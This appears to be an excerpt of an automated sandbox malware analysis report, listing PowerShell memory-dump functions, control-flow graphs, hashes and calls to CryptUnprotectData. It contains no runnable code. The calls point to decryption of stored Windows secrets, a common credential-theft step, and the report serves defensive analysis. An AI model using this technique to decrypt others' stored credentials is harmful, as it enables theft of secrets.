                                                                      • Opcode Fuzzy Hash: 2703d216786699126ca12185e824e6f78f26b489a15ddce77a456afff9eb7ce7
                                                                      • Instruction Fuzzy Hash: E7511971A1DA4C9FD758EB2CD805AB97BE4EF5A350F0441BFE04DC3292CE64A8058BC2
                                                                      Function 00007FFAAB7D4B42 Relevance: 1.6, APIs: 1, Instructions: 122encryptionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 23 7ffaab7d4b42-7ffaab7d5100 25 7ffaab7d5107-7ffaab7d5181 CryptUnprotectData 23->25 26 7ffaab7d5189-7ffaab7d51b8 25->26 27 7ffaab7d5183 25->27 27->26
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1652323334.00007FFAAB7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab7d0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 61d3f7c1e65e0e1b1f36b5aa86fe36d359ba474bb035f52a9138ebe160e61928
                                                                      • Instruction ID: f7f86b0ac44aacfba15b80d50e2444b4dd61a44220d2342e683fb8f4e4703904
                                                                      • Opcode Fuzzy Hash: 61d3f7c1e65e0e1b1f36b5aa86fe36d359ba474bb035f52a9138ebe160e61928
                                                                      • Instruction Fuzzy Hash: B031C33191CA489FDB18DF5CD806AB9BBE0FB59311F00822FE449D3652DB74A8568BC2

                                                                      Execution Graph

                                                                      Execution Coverage:6.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:4
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 1683 7ffaab894fee 1684 7ffaab89500a 1683->1684 1685 7ffaab895107 CryptUnprotectData 1684->1685 1686 7ffaab895183 1685->1686

                                                                      Executed Functions

                                                                      Function 00007FFAAB894FEE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 221encryptionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 126 7ffaab894fee-7ffaab8950a9 call 7ffaab893f08 call 7ffaab8901e8 141 7ffaab8950ab 126->141 142 7ffaab8950ac-7ffaab8950bd 126->142 141->142 143 7ffaab8950bf 142->143 144 7ffaab8950c0-7ffaab895181 CryptUnprotectData 142->144 143->144 147 7ffaab895183 144->147 148 7ffaab895189-7ffaab8951b8 144->148 147->148
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.1754133754.00007FFAAB890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_7ffaab890000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID: 6w
                                                                      • API String ID: 834300711-2008936911
                                                                      • Opcode ID: 45de892f169315131d820bfd3149950c6de8eec5f239b22c3b3129740527a461
                                                                      • Instruction ID: 7cd1a1cc0b6b70c6b2d40d554c23b4e9bb5c73a550c4efc1aabf4d88308c1c38
                                                                      • Opcode Fuzzy Hash: 45de892f169315131d820bfd3149950c6de8eec5f239b22c3b3129740527a461
                                                                      • Instruction Fuzzy Hash: D551E971A1CB489FDB58EB6CD8056B97BE4FF5A311F0441BEE04DC3292DA24A85587C2
                                                                      Function 00007FFAAB9608C1 Relevance: 8.3, Strings: 6, Instructions: 788COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ffaab9608c1-7ffaab960933 5 7ffaab960a39-7ffaab960a43 0->5 6 7ffaab960939-7ffaab960946 0->6 7 7ffaab960a52-7ffaab960a92 5->7 8 7ffaab960a45-7ffaab960a51 5->8 9 7ffaab96094c-7ffaab960956 6->9 10 7ffaab960a95-7ffaab960aa1 6->10 7->10 11 7ffaab960970-7ffaab960980 9->11 12 7ffaab960958-7ffaab96096e 9->12 19 7ffaab960aa9 10->19 20 7ffaab960aa3 10->20 17 7ffaab96098d-7ffaab9609a2 11->17 18 7ffaab960982-7ffaab96098b 11->18 12->11 17->10 28 7ffaab9609a8-7ffaab9609b2 17->28 18->17 22 7ffaab960aab 19->22 23 7ffaab960aad-7ffaab960ae7 19->23 20->19 22->23 26 7ffaab960aed-7ffaab960b40 22->26 23->26 30 7ffaab960eab-7ffaab960ee6 26->30 31 7ffaab960b46-7ffaab960b50 26->31 32 7ffaab9609cb-7ffaab960a38 28->32 33 7ffaab9609b4-7ffaab9609c1 28->33 52 7ffaab960f11-7ffaab960f53 30->52 53 7ffaab960ee8-7ffaab960f07 30->53 35 7ffaab960b6c-7ffaab960b79 31->35 36 7ffaab960b52-7ffaab960b6a 31->36 33->32 41 7ffaab9609c3-7ffaab9609c9 33->41 45 7ffaab960b7f-7ffaab960b82 35->45 46 7ffaab960e3b-7ffaab960e45 35->46 36->35 41->32 45->46 50 7ffaab960b88-7ffaab960b94 45->50 54 7ffaab960e47-7ffaab960e55 46->54 55 7ffaab960e56-7ffaab960ea8 46->55 50->30 57 7ffaab960b9a-7ffaab960ba4 50->57 53->52 55->30 60 7ffaab960bbd-7ffaab960bc2 57->60 61 7ffaab960ba6-7ffaab960bb3 57->61 60->46 67 7ffaab960bc8-7ffaab960bcd 60->67 61->60 69 7ffaab960bb5-7ffaab960bbb 61->69 67->46 70 7ffaab960bd3-7ffaab960bd6 67->70 69->60 70->46 72 7ffaab960bdc-7ffaab960be1 70->72 72->46 75 7ffaab960be7-7ffaab960bf9 72->75 76 7ffaab960bfb-7ffaab960c05 75->76 77 7ffaab960c09 75->77 78 7ffaab960c07 76->78 79 7ffaab960c25-7ffaab960c43 76->79 80 7ffaab960c0e-7ffaab960c1b 77->80 78->80 79->77 83 7ffaab960c45-7ffaab960c4f 79->83 80->79 84 7ffaab960c1d-7ffaab960c23 80->84 85 7ffaab960c51-7ffaab960c66 83->85 86 7ffaab960c68-7ffaab960cea 83->86 84->79 85->86 95 7ffaab960cfa 86->95 96 7ffaab960cec-7ffaab960cf6 86->96 99 7ffaab960cff-7ffaab960d14 95->99 97 7ffaab960d16-7ffaab960d1d 96->97 98 7ffaab960cf8 96->98 100 7ffaab960d1f-7ffaab960d38 97->100 101 7ffaab960d3a-7ffaab960d58 97->101 98->99 99->97 100->101 101->95 105 7ffaab960d5a-7ffaab960d64 101->105 107 7ffaab960d7d-7ffaab960dde 105->107 108 7ffaab960d66-7ffaab960d7b 105->108 117 7ffaab960de0-7ffaab960dee 107->117 118 7ffaab960df2-7ffaab960e12 107->118 108->107 117->118 121 7ffaab960e2b-7ffaab960e3a 118->121 122 7ffaab960e14-7ffaab960e21 118->122 122->121 124 7ffaab960e23-7ffaab960e29 122->124 124->121
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.1754593238.00007FFAAB960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_7ffaab960000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0A_H$r6w$r6w$r6w$r6w$r6w
                                                                      • API String ID: 0-2233467570
                                                                      • Opcode ID: 6affa3da55a3754dde488fa174794ca2f59336af863f52afdbca8fe5fa0bb047
                                                                      • Instruction ID: 8dd18674e61957d50e4f16a44fcca7cc64032f859dceeabc11ae16749cedc3ab
                                                                      • Opcode Fuzzy Hash: 6affa3da55a3754dde488fa174794ca2f59336af863f52afdbca8fe5fa0bb047
                                                                      • Instruction Fuzzy Hash: 9F32483290DB898FE795DB2888E46B4BBE1EF56350B0841BED05DC71A3DE29AC45C7C1